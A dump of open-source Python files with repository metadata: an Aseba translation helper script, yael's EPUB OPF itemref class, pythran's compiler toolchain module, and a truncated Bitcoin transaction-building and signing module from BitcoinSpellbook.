shutil.move(tmp_file2, studio_qrc)
translation_tools.do_git_add(studio_qrc)
print "Done\n"
# We have to update challenge.cpp
print "Updating challenge.cpp..."
os.chdir(challenge_path)
tmp_file = "challenge.cpp.tmp"
insert_before_tag(challenge_cpp, tmp_file, cpp_tag, """\tlanguageSelectionBox->addItem(QString::fromUtf8("{}"), "{}");\n""".format(name, code))
os.remove(challenge_cpp)
shutil.move(tmp_file, challenge_cpp)
translation_tools.do_git_add(challenge_cpp)
print "Done\n"
# We have to update challenge-textures.qrc
print "Updating challenge-textures.qrc..."
tmp_file = "challenge-textures.qrc.tmp"
insert_before_tag(challenge_qrc, tmp_file, challenge_qrc_tag, """\t<file>asebachallenge_{}.qm</file>\n""".format(code))
os.remove(challenge_qrc)
shutil.move(tmp_file, challenge_qrc)
translation_tools.do_git_add(challenge_qrc)
print "Done\n"
# Update updatedoc.py, if asked by the user
if wikidot_url:
os.chdir(updatedoc_path)
print "Updating updatedoc.py"
tmp_file = "updatedoc.py.tmp"
insert_before_tag(updatedoc, tmp_file, updatedoc_tag, """ '{}':'{}',\n""".format(code, wikidot_url))
os.remove(updatedoc)
shutil.move(tmp_file, updatedoc)
translation_tools.do_git_add(updatedoc)
print "Done\n"
print "We are done! Now edit the .ts files with Qt Linguist, then run lrelease on them to generate valid .qm."
print "Finally, do not forget to commit the .ts and .qm files."
print "Have fun :-)\n"
print "*****\n"
| lgpl-3.0 |
pettarin/yael | yael/opfitemref.py | 3 | 3940 | #!/usr/bin/env python
# coding=utf-8
"""
An OPF `<itemref>` element, that is, a child of the `<spine>`.
"""
from yael.element import Element
__author__ = "Alberto Pettarin"
__copyright__ = "Copyright 2015, Alberto Pettarin (www.albertopettarin.it)"
__license__ = "MIT"
__version__ = "0.0.9"
__email__ = "alberto@albertopettarin.it"
__status__ = "Development"
class OPFItemref(Element):
"""
Build an OPF `<itemref>` element or
parse it from `obj` or `string`.
"""
A_ID = "id"
A_IDREF = "idref"
A_LINEAR = "linear"
A_PROPERTIES = "properties"
V_PAGE_SPREAD_LEFT = "page-spread-left"
V_PAGE_SPREAD_RIGHT = "page-spread-right"
V_RENDITION_ALIGN_X_CENTER = "rendition:align-x-center"
V_RENDITION_FLOW_AUTO = "rendition:flow-auto"
V_RENDITION_FLOW_PAGINATED = "rendition:flow-paginated"
V_RENDITION_FLOW_SCROLLED_CONTINUOUS = "rendition:flow-scrolled-continuous"
V_RENDITION_FLOW_SCROLLED_DOC = "rendition:flow-scrolled-doc"
V_RENDITION_LAYOUT_PRE_PAGINATED = "rendition:layout-pre-paginated"
V_RENDITION_LAYOUT_REFLOWABLE = "rendition:layout-reflowable"
V_RENDITION_ORIENTATION_AUTO = "rendition:orientation-auto"
V_RENDITION_ORIENTATION_LANDSCAPE = "rendition:orientation-landscape"
V_RENDITION_ORIENTATION_PORTRAIT = "rendition:orientation-portrait"
V_RENDITION_PAGE_SPREAD_CENTER = "rendition:page-spread-center"
V_RENDITION_SPREAD_AUTO = "rendition:spread-auto"
V_RENDITION_SPREAD_BOTH = "rendition:spread-both"
V_RENDITION_SPREAD_LANDSCAPE = "rendition:spread-landscape"
V_RENDITION_SPREAD_NONE = "rendition:spread-none"
V_RENDITION_SPREAD_PORTRAIT = "rendition:spread-portrait"
def __init__(self, internal_path=None, obj=None, string=None):
self.v_id = None
self.v_idref = None
self.v_linear = None
self.v_properties = None
Element.__init__(
self,
internal_path=internal_path,
obj=obj,
string=string)
def json_object(self, recursive=True):
obj = {
"id": self.v_id,
"idref": self.v_idref,
"linear": self.v_linear,
"properties": self.v_properties
}
return obj
def parse_object(self, obj):
# set attributes
self.v_id = obj.get(OPFItemref.A_ID)
self.v_idref = obj.get(OPFItemref.A_IDREF)
self.v_linear = obj.get(OPFItemref.A_LINEAR)
self.v_properties = obj.get(OPFItemref.A_PROPERTIES)
def has_property(self, v_property):
"""
Return True if this itemref has the given property.
:param v_property: a property name
:type v_property: str
:returns: True if the itemref has the property
:rtype: bool
"""
if self.v_properties != None:
return v_property in self.v_properties.split(" ")
return False
@property
def v_id(self):
"""
The value of the `id` attribute.
:rtype: str
"""
return self.__v_id
@v_id.setter
def v_id(self, v_id):
self.__v_id = v_id
@property
def v_idref(self):
"""
The value of the `idref` attribute.
:rtype: str
"""
return self.__v_idref
@v_idref.setter
def v_idref(self, v_idref):
self.__v_idref = v_idref
@property
def v_linear(self):
"""
The value of the `linear` attribute.
:rtype: str
"""
return self.__v_linear
@v_linear.setter
def v_linear(self, v_linear):
self.__v_linear = v_linear
@property
def v_properties(self):
"""
The value of the `properties` attribute.
:rtype: str
"""
return self.__v_properties
@v_properties.setter
def v_properties(self, v_properties):
self.__v_properties = v_properties
| mit |
pombredanne/pythran | pythran/toolchain.py | 2 | 12759 | '''
This module contains all the stuff to make your way from python code to
a dynamic library, see __init__.py for exported interfaces.
'''
from pythran.backend import Cxx
from pythran.config import cfg, make_extension
from pythran.cxxgen import PythonModule, Define, Include, Line, Statement
from pythran.cxxgen import FunctionBody, FunctionDeclaration, Value, Block
from pythran.middlend import refine
from pythran.passmanager import PassManager
from pythran.tables import pythran_ward
from pythran.types.types import extract_constructed_types
from pythran.types.type_dependencies import pytype_to_deps
from pythran.types.conversion import pytype_to_ctype
from pythran.spec import expand_specs, specs_to_docstrings
from pythran.syntax import check_specs
from pythran.version import __version__
import pythran.frontend as frontend
from datetime import datetime
from distutils.errors import CompileError
from numpy.distutils.core import setup
from numpy.distutils.extension import Extension
import numpy.distutils.ccompiler
from tempfile import mkstemp, mkdtemp
import ast
import logging
import os.path
import shutil
import sys
import glob
import hashlib
logger = logging.getLogger('pythran')
# hook taken from numpy.distutils.compiler
# with useless steps and warning removed
def CCompiler_customize(self, _, need_cxx=0):
logger.info('customize %s', self.__class__.__name__)
numpy.distutils.ccompiler.customize_compiler(self)
if need_cxx:
# In general, distutils uses -Wstrict-prototypes, but this option is
# not valid for C++ code, only for C. Remove it if it's there to
# avoid a spurious warning on every compilation.
try:
self.compiler_so.remove('-Wstrict-prototypes')
except (AttributeError, ValueError):
pass
numpy.distutils.ccompiler.replace_method(numpy.distutils.ccompiler.CCompiler,
'customize', CCompiler_customize)
def _extract_all_constructed_types(v):
return sorted(set(reduce(lambda x, y: x + y,
(extract_constructed_types(t) for t in v), [])),
key=len)
def _extract_specs_dependencies(specs):
""" Extract types dependencies from specs for each exported signature. """
deps = set()
# for each function
for signatures in specs.values():
# for each signature
for signature in signatures:
# for each argument
for t in signature:
deps.update(pytype_to_deps(t))
# Keep "include" first
return sorted(deps, key=lambda x: "include" not in x)
def _parse_optimization(optimization):
'''Turns an optimization of the form
my_optim
my_package.my_optim
into the associated symbol'''
splitted = optimization.split('.')
if len(splitted) == 1:
splitted = ['pythran', 'optimizations'] + splitted
return reduce(getattr, splitted[1:], __import__(splitted[0]))
def _get_temp(content, suffix=".cpp"):
'''Get a temporary file for given content, default extension is .cpp
It is user's responsability to delete when done.'''
fd, fdpath = mkstemp(suffix)
with os.fdopen(fd, "w") as cpp:
cpp.write(content)
return fd, fdpath
class HasArgument(ast.NodeVisitor):
'''Checks if a given function has arguments'''
def __init__(self, fname):
self.fname = fname
def visit_Module(self, node):
for n in node.body:
if isinstance(n, ast.FunctionDef) and n.name == self.fname:
return len(n.args.args) > 0
return False
# PUBLIC INTERFACE STARTS HERE
def generate_cxx(module_name, code, specs=None, optimizations=None):
'''python + pythran spec -> c++ code
returns a PythonModule object
'''
if sys.version_info[0] == 3:
raise ValueError(
"Pythran does not fully support Python3, "
"it can only be used to compile C++ code "
"generated with the -E flag with a Python2 version of Pythran. "
"Sorry about this :-/")
pm = PassManager(module_name)
# front end
ir, renamings, docstrings = frontend.parse(pm, code)
# middle-end
optimizations = (optimizations or
cfg.get('pythran', 'optimizations').split())
optimizations = [_parse_optimization(opt) for opt in optimizations]
refine(pm, ir, optimizations)
# back-end
content = pm.dump(Cxx, ir)
# instanciate the meta program
if specs is None:
class Generable(object):
def __init__(self, content):
self.content = content
def __str__(self):
return str(self.content)
generate = __str__
mod = Generable(content)
else:
# uniform typing
for fname, signatures in specs.items():
if not isinstance(signatures, tuple):
specs[fname] = (signatures,)
# verify the pythran export are compatible with the code
specs = expand_specs(specs)
check_specs(ir, specs, renamings)
specs_to_docstrings(specs, docstrings)
metainfo = {'hash': hashlib.sha256(code).hexdigest(),
'version': __version__,
'date': datetime.now()}
mod = PythonModule(module_name, docstrings, metainfo)
mod.add_to_preamble(Define("BOOST_SIMD_NO_STRICT_ALIASING", "1"))
mod.add_to_includes(Include("pythonic/core.hpp"),
Include("pythonic/python/core.hpp"),
# FIXME: only include these when needed
Include("pythonic/types/bool.hpp"),
Include("pythonic/types/int.hpp"),
Line("#ifdef _OPENMP\n#include <omp.h>\n#endif")
)
mod.add_to_includes(*[Include(inc) for inc in
_extract_specs_dependencies(specs)])
mod.add_to_includes(*content.body)
for function_name, signatures in specs.iteritems():
internal_func_name = renamings.get(function_name,
function_name)
# global variables are functions with no signatures :-)
if not signatures:
mod.add_global_var(function_name,
"{}()()".format(
pythran_ward + '{0}::{1}'.format(
module_name, internal_func_name)))
for sigid, signature in enumerate(signatures):
numbered_function_name = "{0}{1}".format(internal_func_name,
sigid)
arguments_types = [pytype_to_ctype(t) for t in signature]
has_arguments = HasArgument(internal_func_name).visit(ir)
arguments = ["a{0}".format(i)
for i in xrange(len(arguments_types))]
name_fmt = pythran_ward + "{0}::{1}::type{2}"
args_list = ", ".join(arguments_types)
specialized_fname = name_fmt.format(module_name,
internal_func_name,
"<{0}>".format(args_list)
if has_arguments else "")
result_type = "typename %s::result_type" % specialized_fname
mod.add_function(
FunctionBody(
FunctionDeclaration(
Value(
result_type,
numbered_function_name),
[Value(t, a)
for t, a in zip(arguments_types, arguments)]),
Block([Statement("return {0}()({1})".format(
pythran_ward + '{0}::{1}'.format(
module_name, internal_func_name),
', '.join(arguments)))])
),
function_name,
arguments_types
)
return mod
def compile_cxxfile(module_name, cxxfile, output_binary=None, **kwargs):
'''c++ file -> native module
Return the filename of the produced shared library
Raises CompileError on failure
'''
builddir = mkdtemp()
buildtmp = mkdtemp()
extension_args = make_extension(**kwargs)
extension = Extension(module_name,
[cxxfile],
language="c++",
**extension_args)
try:
setup(name=module_name,
ext_modules=[extension],
# fake CLI call
script_name='setup.py',
script_args=['--verbose'
if logger.isEnabledFor(logging.INFO)
else '--quiet',
'build_ext',
'--build-lib', builddir,
'--build-temp', buildtmp,
]
)
except SystemExit as e:
raise CompileError(e.args)
[target] = glob.glob(os.path.join(builddir, module_name + "*"))
if not output_binary:
output_binary = os.path.join(os.getcwd(),
module_name + os.path.splitext(target)[1])
shutil.move(target, output_binary)
shutil.rmtree(builddir)
shutil.rmtree(buildtmp)
logger.info("Generated module: " + module_name)
logger.info("Output: " + output_binary)
return output_binary
def compile_cxxcode(module_name, cxxcode, output_binary=None, keep_temp=False,
**kwargs):
'''c++ code (string) -> temporary file -> native module.
Returns the generated .so.
'''
# Get a temporary C++ file to compile
_, fdpath = _get_temp(cxxcode)
output_binary = compile_cxxfile(module_name, fdpath,
output_binary, **kwargs)
if not keep_temp:
# remove tempfile
os.remove(fdpath)
else:
logger.warn("Keeping temporary generated file:" + fdpath)
return output_binary
def compile_pythrancode(module_name, pythrancode, specs=None,
opts=None, cpponly=False, output_file=None,
**kwargs):
'''Pythran code (string) -> c++ code -> native module
Returns the generated .so (or .cpp if `cpponly` is set to true).
'''
# Autodetect the Pythran spec if not given as parameter
from pythran.spec import spec_parser
if specs is None:
specs = spec_parser(pythrancode)
# Generate C++, get a PythonModule object
module = generate_cxx(module_name, pythrancode, specs, opts)
if cpponly:
# User wants only the C++ code
_, tmp_file = _get_temp(str(module))
if not output_file:
output_file = module_name + ".cpp"
shutil.move(tmp_file, output_file)
logger.info("Generated C++ source file: " + output_file)
else:
# Compile to binary
output_file = compile_cxxcode(module_name,
str(module.generate()),
output_binary=output_file,
**kwargs)
return output_file
def compile_pythranfile(file_path, output_file=None, module_name=None,
cpponly=False, **kwargs):
"""
Pythran file -> c++ file -> native module.
Returns the generated .so (or .cpp if `cpponly` is set to true).
"""
if not output_file:
# derive module name from input file name
_, basename = os.path.split(file_path)
module_name = module_name or os.path.splitext(basename)[0]
else:
# derive module name from destination output_file name
_, basename = os.path.split(output_file)
module_name = module_name or os.path.splitext(basename)[0]
# Add compiled module path to search for imported modules
sys.path.append(os.path.dirname(file_path))
output_file = compile_pythrancode(module_name, open(file_path).read(),
output_file=output_file,
cpponly=cpponly,
**kwargs)
return output_file
def test_compile():
'''Simple passthrough compile test.
May raises CompileError Exception.
'''
code = '''
#define BOOST_PYTHON_MAX_ARITY 4
#include <pythonic/core.hpp>
'''
output_file = compile_cxxcode('test', code)
output_file and os.remove(output_file)
| bsd-3-clause |
ValyrianTech/BitcoinSpellbook-v0.3 | transactionfactory.py | 1 | 21726 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import hmac
import copy
from helpers.py2specials import *
from helpers.py3specials import *
from helpers.privatekeyhelpers import privkey_to_pubkey, decode_privkey, get_privkey_format, encode_privkey
from helpers.publickeyhelpers import pubkey_to_address
from helpers.jacobianhelpers import fast_multiply, inv, G, N
from helpers.bech32 import bech32_decode
from helpers.bech32 import decode as decode_witness_program
from helpers.loghelpers import LOG
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
# this works like SIGHASH_ANYONECANPAY | SIGHASH_ALL, might as well make it explicit while
# we fix the constant
SIGHASH_ANYONECANPAY = 0x81
is_python2 = sys.version_info.major == 2
def make_custom_tx(private_keys, tx_inputs, tx_outputs, tx_fee=0, op_return_data=None, allow_zero_conf=False):
"""
Construct a custom transaction
:param private_keys: a dict containing a key for each required address with the corresponding private key
:param tx_inputs: a list of dicts containing the following keys: 'address', 'value', 'output' and 'confirmations'
output should be formatted as 'txid:i'
:param tx_outputs: a list of dicts containing the keys 'address' and 'value'
:param tx_fee: The total transaction fee in satoshis (The fee must be equal to the difference of the inputs and the outputs, this is an extra safety precaution)
:param op_return_data: an optional message to add as an OP_RETURN output (max 80 chars)
:param allow_zero_conf: Allow zero confirmation inputs (default=False)
:return: A raw transaction
"""
# Check if the transaction fee is valid
if not isinstance(tx_fee, int) or tx_fee < 0:
LOG.error('Invalid transaction fee: %d satoshis' % tx_fee)
LOG.error('type: %s' % type(tx_fee))
return
# Check if the supplied fee is equal to the difference between the total input value and total output value
total_input_value = sum([tx_input['value'] for tx_input in tx_inputs])
total_output_value = sum([tx_output['value'] for tx_output in tx_outputs])
if tx_fee != total_input_value - total_output_value:
LOG.error('Transaction fee does not match the difference between the total input value and the total output value!')
LOG.error('Total input: %s, Total output: %s, Transaction fee: %s' % (total_input_value, total_output_value, tx_fee))
return
# Check if all required private keys have been supplied
all_keys_present = all([tx_input['address'] in private_keys for tx_input in tx_inputs])
if not all_keys_present:
LOG.error("At least 1 private key is missing.")
return
if allow_zero_conf is False:
# Check if all inputs have at least 1 confirmation
all_inputs_confirmed = all([tx_input['confirmations'] > 0 for tx_input in tx_inputs])
if not all_inputs_confirmed:
LOG.error("At least 1 input is unconfirmed.")
return
# Check if an OP_RETURN message needs to be added and if it is valid
if isinstance(op_return_data, string_types) and len(op_return_data) > 80:
LOG.error('OP_RETURN data is longer than 80 characters')
return
# All is good, make the transaction
tx = mktx(tx_inputs, tx_outputs)
# Add OP_RETURN message if necessary
if isinstance(op_return_data, string_types):
tx = add_op_return(op_return_data, tx)
# Now sign each transaction input with the private key
for i in range(0, len(tx_inputs)):
tx = sign(tx, i, str(private_keys[tx_inputs[i]['address']]))
return tx
# def send_tx(tx):
# success = False
# response = {}
# try:
# # retval = pybitcointools.blockr_pushtx(tx)
# retval = {'status': 'success'}
# logging.info("TX broadcast succeeded, Blockr response: %s" % str(retval))
# response = json.loads(retval)
# except Exception as e:
# logging.error("TX broadcast failed: %s" % str(e))
#
# if 'status' in response and response['status'] == 'success':
# success = True
#
# return success
# extra functions for op_return from a fork of pybitcointools
# https://github.com/wizardofozzie/pybitcointools
def num_to_op_push(x):
x = int(x)
if 0 <= x <= 75:
pc = b''
num = encode(x, 256, 1)
elif x < 0xff:
pc = from_int_to_byte(0x4c)
num = encode(x, 256, 1)
elif x < 0xffff:
pc = from_int_to_byte(0x4d)
num = encode(x, 256, 2)[::-1]
elif x < 0xffffffff:
pc = from_int_to_byte(0x4e)
num = encode(x, 256, 4)[::-1]
else:
raise ValueError("0xffffffff > value >= 0")
return pc + num
def op_return_script(hex_data):
"""
Construct the OP_RETURN script for given data
:param hex_data: The data to add as OP_RETURN in hexadecimal format
:return: The OP_RETURN script
"""
if not isinstance(hex_data, str):
raise Exception('Data to add as OP_RETURN must be a string containing a hexadecimal number')
if re.match('^[0-9a-fA-F]*$', hex_data) is None or len(hex_data) % 2 != 0:
raise Exception('Data to add as OP_RETURN must be in hex format')
return '6a' + safe_hexlify(num_to_op_push(len(hex_data)/2)) + hex_data
def add_op_return(msg, tx_hex=None):
"""Makes OP_RETURN script from msg, embeds in Tx hex"""
hex_data = op_return_script(hex_data=safe_hexlify(msg.encode()))
if tx_hex is None:
return hex_data
else:
if not re.match("^[0-9a-fA-F]*$", tx_hex):
return binascii.unhexlify(add_op_return(msg, binascii.hexlify(tx_hex)))
elif isinstance(tx_hex, dict):
txo = tx_hex
outs = txo.get('outs')
else:
outs = deserialize(tx_hex).get('outs')
txo = deserialize(tx_hex)
assert (len(outs) > 0) and sum(multiaccess(outs, 'value')) > 0 \
and not any([o for o in outs if o.get("script")[:2] == '6a']), \
"Tx limited to *1* OP_RETURN, and only whilst the other outputs send funds"
txo['outs'].append({'script': hex_data, 'value': 0})
return serialize(txo)
# copied from pybitcointools
def serialize(txobj):
# if isinstance(txobj, bytes):
# txobj = bytes_to_hex_string(txobj)
o = []
if json_is_base(txobj, 16):
json_changedbase = json_changebase(txobj, lambda x: binascii.unhexlify(x))
hexlified = safe_hexlify(serialize(json_changedbase))
return hexlified
o.append(encode(txobj["version"], 256, 4)[::-1])
o.append(num_to_var_int(len(txobj["ins"])))
for inp in txobj["ins"]:
o.append(inp["outpoint"]["hash"][::-1])
o.append(encode(inp["outpoint"]["index"], 256, 4)[::-1])
o.append(num_to_var_int(len(inp["script"]))+(inp["script"] if inp["script"] or is_python2 else bytes()))
o.append(encode(inp["sequence"], 256, 4)[::-1])
o.append(num_to_var_int(len(txobj["outs"])))
for out in txobj["outs"]:
o.append(encode(out["value"], 256, 8)[::-1])
o.append(num_to_var_int(len(out["script"]))+out["script"])
o.append(encode(txobj["locktime"], 256, 4)[::-1])
return ''.join(o) if is_python2 else reduce(lambda x,y: x+y, o, bytes())
def deserialize(tx):
if isinstance(tx, str) and re.match('^[0-9a-fA-F]*$', tx):
# tx = bytes(bytearray.fromhex(tx))
return json_changebase(deserialize(binascii.unhexlify(tx)),
lambda x: safe_hexlify(x))
# http://stackoverflow.com/questions/4851463/python-closure-write-to-variable-in-parent-scope
# Python's scoping rules are demented, requiring me to make pos an object
# so that it is call-by-reference
pos = [0]
def read_as_int(bytez):
pos[0] += bytez
return decode(tx[pos[0] - bytez:pos[0]][::-1], 256)
def read_var_int():
pos[0] += 1
val = from_byte_to_int(tx[pos[0] - 1])
if val < 253:
return val
return read_as_int(pow(2, val - 252))
def read_bytes(bytez):
pos[0] += bytez
return tx[pos[0] - bytez:pos[0]]
def read_var_string():
size = read_var_int()
return read_bytes(size)
obj = {"ins": [], "outs": [], "version": read_as_int(4)}
ins = read_var_int()
for i in range(ins):
obj["ins"].append({
"outpoint": {
"hash": read_bytes(32)[::-1],
"index": read_as_int(4)
},
"script": read_var_string(),
"sequence": read_as_int(4)
})
outs = read_var_int()
for i in range(outs):
obj["outs"].append({
"value": read_as_int(8),
"script": read_var_string()
})
obj["locktime"] = read_as_int(4)
return obj
def access(obj, prop):
if isinstance(obj, dict):
if prop in obj:
return obj[prop]
elif '.' in prop:
return obj[float(prop)]
else:
return obj[int(prop)]
else:
return obj[int(prop)]
def multiaccess(obj, prop):
return [access(o, prop) for o in obj]
def mktx(*args):
# [in0, in1...],[out0, out1...] or in0, in1 ... out0 out1 ...
ins, outs = [], []
for arg in args:
if isinstance(arg, list):
for a in arg: (ins if is_inp(a) else outs).append(a)
else:
(ins if is_inp(arg) else outs).append(arg)
txobj = {"locktime": 0, "version": 1, "ins": [], "outs": []}
for i in ins:
if isinstance(i, dict) and "outpoint" in i:
txobj["ins"].append(i)
else:
if isinstance(i, dict) and "output" in i:
i = i["output"]
txobj["ins"].append({
"outpoint": {"hash": i[:64], "index": int(i[65:])},
"script": "",
"sequence": 4294967295
})
for o in outs:
if isinstance(o, string_or_bytes_types):
addr = o[:o.find(':')]
val = int(o[o.find(':')+1:])
o = {}
if re.match('^[0-9a-fA-F]*$', addr):
o["script"] = addr
else:
o["address"] = addr
o["value"] = val
outobj = {}
if "address" in o:
outobj["script"] = address_to_script(o["address"])
elif "script" in o:
outobj["script"] = o["script"]
else:
raise Exception("Could not find 'address' or 'script' in output.")
outobj["value"] = o["value"]
txobj["outs"].append(outobj)
return serialize(txobj)
def sign(tx, i, priv, hashcode=SIGHASH_ALL):
i = int(i)
if (not is_python2 and isinstance(re, bytes)) or not re.match('^[0-9a-fA-F]*$', tx):
return binascii.unhexlify(sign(safe_hexlify(tx), i, priv))
if len(priv) <= 33:
priv = safe_hexlify(priv)
pub = privkey_to_pubkey(priv)
address = pubkey_to_address(pub)
signing_tx = signature_form(tx, i, p2pkh_script(address), hashcode)
sig = ecdsa_tx_sign(signing_tx, priv, hashcode)
txobj = deserialize(tx)
txobj["ins"][i]["script"] = serialize_script([sig, pub])
return serialize(txobj)
def is_inp(arg):
return len(arg) > 64 or "output" in arg or "outpoint" in arg
def json_is_base(obj, base):
if not is_python2 and isinstance(obj, bytes):
return False
alpha = get_code_string(base)
if isinstance(obj, string_types):
for i in range(len(obj)):
if alpha.find(obj[i]) == -1:
return False
return True
elif isinstance(obj, int_types) or obj is None:
return True
elif isinstance(obj, list):
for i in range(len(obj)):
if not json_is_base(obj[i], base):
return False
return True
else:
for x in obj:
if not json_is_base(obj[x], base):
return False
return True
def json_changebase(obj, changer):
if isinstance(obj, string_or_bytes_types):
return changer(obj)
elif isinstance(obj, int_types) or obj is None:
return obj
elif isinstance(obj, list):
return [json_changebase(x, changer) for x in obj]
return dict((x, json_changebase(obj[x], changer)) for x in obj)
def num_to_var_int(x):
x = int(x)
if x < 253:
return from_int_to_byte(x)
elif x < 65536:
return from_int_to_byte(253)+encode(x, 256, 2)[::-1]
elif x < 4294967296:
return from_int_to_byte(254) + encode(x, 256, 4)[::-1]
else:
return from_int_to_byte(255) + encode(x, 256, 8)[::-1]
def b58check_to_hex(address):
"""
Convert a base58check string to hexadecimal format
:param address: A Bitcoin address
:return: A base58check string in hexadecimal format
"""
return safe_hexlify(b58check_to_bin(address))
def b58check_to_bin(address):
"""
Do a base58 check on the address and return the address minus first byte and the checksum (last 4 bytes) in binary format
:param address: A Bitcoin address
:return: A base58check string in binary format
"""
leadingzbytes = len(re.match('^1*', address).group(0)) # number of leading zero bytes (1 == 0 in base58)
data = b'\x00' * leadingzbytes + changebase(address, 58, 256)
assert bin_dbl_sha256(data[:-4])[:4] == data[-4:]
return data[1:-4]
def p2sh_script(address):
"""
Make a Pay-To-Script-Hash (P2SH) script
This is the type of scripts used by multisig addresses -> starting with 3 (mainnet) or 2 (testnet)
OP_HASH160 <redeemScriptHash> OP_EQUAL
a9 14 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA 87
OP_HASH160 Bytes to push Data to push OP_EQUAL
14 hex = 20 bytes
:param address: A Bitcoin address
:return: a P2SH script
"""
return 'a914' + b58check_to_hex(address) + '87'
def p2pkh_script(address):
"""
Make a Pay-To-Public-Key-Hash (P2PKH) script
This is the type of script old legacy addresses use -> starting with 1 (mainnet) or m or n (testnet)
OP_DUP OP_HASH160 <pubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
76 a9 14 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA 88 ac
OP_DUP OP_HASH160 Bytes to push Data to push OP_EQUALVERIFY OP_CHECKSIG
14 hex = 20 bytes
:param address: A Bitcoin address
:return: a P2PKH script
"""
return '76a914' + b58check_to_hex(address) + '88ac'
def p2wpkh_script(address):
"""
Make a Pay-To-Witness-Public-Key-Hash (P2WPKH) script
This is the type of script used by the new bech32 addresses -> starting with bc1 (mainnet) or tb1 (testnet)
0 <pubKeyHash>
00 14 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA
0 Bytes to push Data to push
14 hex = 20 bytes
:param address: A Bitcoin address
:return: a P2WPKH script
"""
hrp, data = bech32_decode(address)
version, decoded = decode_witness_program(hrp=hrp, addr=address)
if is_python2:
pubkeyhash = ''.join([chr(a) for a in decoded])
else:
pubkeyhash = bytes(decoded)
return '0014' + safe_hexlify(pubkeyhash)
def p2wsh_script(address):
"""
Make a Pay-To-Witness-Script-Hash (P2WSH) script
This is the type of script used by the new bech32 addresses (multisig) -> starting with bc1 (mainnet) or tb1 (testnet)
0 <script hash>
00 20 89 AB CD EF AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA AB BA
0 Bytes to push Data to push
20 hex = 32 bytes
:param address: A Bitcoin address
:return: a P2WPKH script
"""
hrp, data = bech32_decode(address)
version, decoded = decode_witness_program(hrp=hrp, addr=address)
if is_python2:
scripthash = ''.join([chr(a) for a in decoded])
else:
scripthash = bytes(decoded)
return '0020' + safe_hexlify(scripthash)
def address_to_script(address):
"""
Make the script based on the address
:param address: a Bitcoin address
:return: a P2SH or P2PKH script
"""
if address[0] == '3' or address[0] == '2':
return p2sh_script(address=address)
elif address[:3] == 'bc1' or address[:3] == 'tb1':
if len(address) == 42:
return p2wpkh_script(address=address)
elif len(address) == 62:
return p2wsh_script(address=address)
else:
raise Exception('Invalid version 0 bech32 address (length must be 42 or 62): %s' % address)
else:
return p2pkh_script(address=address)
def signature_form(tx, i, script, hashcode=SIGHASH_ALL):
i, hashcode = int(i), int(hashcode)
if isinstance(tx, string_or_bytes_types):
return serialize(signature_form(deserialize(tx), i, script, hashcode))
newtx = copy.deepcopy(tx)
for inp in newtx["ins"]:
inp["script"] = ""
newtx["ins"][i]["script"] = script
if hashcode == SIGHASH_NONE:
newtx["outs"] = []
elif hashcode == SIGHASH_SINGLE:
newtx["outs"] = newtx["outs"][:len(newtx["ins"])]
for out in newtx["outs"][:len(newtx["ins"]) - 1]:
out['value'] = 2**64 - 1
out['script'] = ""
elif hashcode == SIGHASH_ANYONECANPAY:
newtx["ins"] = [newtx["ins"][i]]
else:
pass
return newtx
if is_python2:
def serialize_script(script):
if json_is_base(script, 16):
return binascii.hexlify(serialize_script(json_changebase(script,
lambda x: binascii.unhexlify(x))))
return ''.join(map(serialize_script_unit, script))
else:
def serialize_script(script):
if json_is_base(script, 16):
return safe_hexlify(serialize_script(json_changebase(script,
lambda x: binascii.unhexlify(x))))
result = bytes()
for b in map(serialize_script_unit, script):
result += b if isinstance(b, bytes) else bytes(b, 'utf-8')
return result
def serialize_script_unit(unit):
if isinstance(unit, int):
if unit < 16:
return from_int_to_byte(unit + 80)
else:
return from_int_to_byte(unit)
elif unit is None:
return b'\x00'
else:
if len(unit) <= 75:
return from_int_to_byte(len(unit))+unit
elif len(unit) < 256:
return from_int_to_byte(76)+from_int_to_byte(len(unit))+unit
elif len(unit) < 65536:
return from_int_to_byte(77)+encode(len(unit), 256, 2)[::-1]+unit
else:
return from_int_to_byte(78)+encode(len(unit), 256, 4)[::-1]+unit
def der_encode_sig(v, r, s):
b1, b2 = safe_hexlify(encode(r, 256)), safe_hexlify(encode(s, 256))
if len(b1) and b1[0] in '89abcdef':
b1 = '00' + b1
if len(b2) and b2[0] in '89abcdef':
b2 = '00' + b2
left = '02'+encode(len(b1)//2, 16, 2)+b1
right = '02'+encode(len(b2)//2, 16, 2)+b2
return '30'+encode(len(left+right)//2, 16, 2)+left+right
def ecdsa_tx_sign(tx, priv, hashcode=SIGHASH_ALL):
rawsig = ecdsa_raw_sign(bin_txhash(tx, hashcode), priv)
return der_encode_sig(*rawsig)+encode(hashcode, 16, 2)
def ecdsa_raw_sign(msghash, priv):
z = hash_to_int(msghash)
k = deterministic_generate_k(msghash, priv)
r, y = fast_multiply(G, k)
s = inv(k, N) * (z + r*decode_privkey(priv)) % N
v, r, s = 27+((y % 2) ^ (0 if s * 2 < N else 1)), r, s if s * 2 < N else N - s
if 'compressed' in get_privkey_format(priv):
v += 4
return v, r, s
def hash_to_int(string):
"""
Convert a hash string to an integer
:param string: a hash string
:return: an integer
"""
if len(string) in [40, 64]:
return decode(string, 16)
return decode(string, 256)
def deterministic_generate_k(msghash, priv):
v = b'\x01' * 32
k = b'\x00' * 32
priv = encode_privkey(priv, 'bin')
msghash = encode(hash_to_int(msghash), 256, 32)
k = hmac.new(k, v+b'\x00'+priv+msghash, hashlib.sha256).digest()
v = hmac.new(k, v, hashlib.sha256).digest()
k = hmac.new(k, v+b'\x01'+priv+msghash, hashlib.sha256).digest()
v = hmac.new(k, v, hashlib.sha256).digest()
return decode(hmac.new(k, v, hashlib.sha256).digest(), 256)
def bin_txhash(tx, hashcode=None):
"""
Get the transaction hash (txid) in binary format
:param tx: The transaction
:param hashcode: SIGHASH_ALL = 1, SIGHASH_NONE = 2, SIGHASH_SINGLE = 3, SIGHASH_ANYONECANPAY = 0x81
:return: a transaction hash (txid) in binary format
"""
return binascii.unhexlify(txhash(tx, hashcode))
def txhash(tx, hashcode=None):
"""
Get the transaction hash (txid)
:param tx: The transaction
